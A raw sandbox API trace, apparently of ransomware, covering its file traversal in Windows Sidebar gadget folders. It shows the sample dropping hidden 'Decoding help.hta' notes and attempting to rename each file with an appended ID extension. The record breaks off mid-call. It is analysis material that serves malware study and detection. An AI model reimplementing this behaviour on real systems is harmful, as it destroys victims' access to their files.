ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc91, dwReserved0=0x0, dwReserved1=0x0, cFileName="dialdot.png", cAlternateFileName="")) returned 1 [0061.490] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.490] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.490] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0061.490] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0061.490] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dialdot.png") returned -1 [0061.490] lstrlenW (lpString="dialdot.png") returned 11 [0061.490] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.490] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.490] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="dialdot.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png" [0061.490] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png" [0061.490] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.490] FindNextFileW (in: hFindFile=0x245587a8, lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842ddbeb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842ddbeb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29146b0f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xfca, dwReserved0=0x0, dwReserved1=0x0, cFileName="dialdot_lrg.png", cAlternateFileName="")) returned 1 [0061.490] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.490] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.490] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0061.491] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0061.491] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dialdot_lrg.png") returned -1 [0061.491] lstrlenW (lpString="dialdot_lrg.png") returned 15 [0061.491] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.491] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.491] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="dialdot_lrg.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png" [0061.491] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png" [0061.491] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot_lrg.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot_lrg.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.491] FindNextFileW (in: hFindFile=0x245587a8, lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84291931, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84291931, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x290fa853, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial_lrg.png", cAlternateFileName="")) returned 1 [0061.491] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.491] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.491] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0061.491] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0061.491] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dial_lrg.png") returned -1 [0061.491] lstrlenW (lpString="dial_lrg.png") returned 12 [0061.491] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.491] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.491] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="dial_lrg.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png" [0061.491] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png" [0061.491] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.492] FindNextFileW (in: hFindFile=0x245587a8, lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84291931, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84291931, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x291209b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc03, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial_lrg_sml.png", cAlternateFileName="")) returned 1 [0061.492] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.492] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.492] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0061.492] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0061.492] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dial_lrg_sml.png") returned -1 [0061.492] lstrlenW (lpString="dial_lrg_sml.png") returned 16 [0061.492] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.492] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.492] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="dial_lrg_sml.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png" [0061.492] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png" [0061.492] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg_sml.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg_sml.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.492] FindNextFileW (in: hFindFile=0x245587a8, lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8426b7d4, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8426b7d4, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x291209b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial_sml.png", cAlternateFileName="")) returned 1 [0061.492] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.492] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.492] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0061.492] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0061.493] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dial_sml.png") returned -1 [0061.493] lstrlenW (lpString="dial_sml.png") returned 12 [0061.493] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.493] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.493] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="dial_sml.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png" [0061.493] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png" [0061.493] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_sml.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_sml.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.524] FindNextFileW (in: hFindFile=0x245587a8, lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842ddbeb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842ddbeb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29146b0f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x134, dwReserved0=0x0, dwReserved1=0x0, cFileName="glass.png", cAlternateFileName="")) returned 1 Thread: id = 987 os_tid = 0x954 [0060.264] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*", lpFindFileData=0x2330fd30 | out: lpFindFileData=0x2330fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x245586a8 [0060.264] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.264] FindNextFileW (in: hFindFile=0x245586a8, lpFindFileData=0x2330fd30 | out: lpFindFileData=0x2330fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.264] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.264] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.264] FindNextFileW (in: hFindFile=0x245586a8, lpFindFileData=0x2330fd30 | out: lpFindFileData=0x2330fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x104c, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.html", cAlternateFileName="")) returned 1 [0060.264] lstrcpyW (in: lpString1=0x10d96c30, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0060.264] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned 67 [0060.264] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta" [0060.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\decoding help.hta")) returned 0xffffffff [0060.265] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd3c [0061.484] WriteFile (in: hFile=0xd3c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2330fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2330fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.485] CloseHandle (hObject=0xd3c) returned 1 [0061.485] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.486] lstrcmpiW (lpString1="Decoding help.hta", lpString2="clock.html") returned 1 [0061.486] lstrlenW (lpString="clock.html") returned 10 [0061.486] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0061.486] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned 67 [0061.486] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\", lpString2="clock.html" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html" [0061.486] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html" [0061.486] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html.[ID]g9uZrLhJaygpwRm1[ID]" [0061.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\clock.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\clock.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.486] FindNextFileW (in: hFindFile=0x245586a8, lpFindFileData=0x2330fd30 | out: 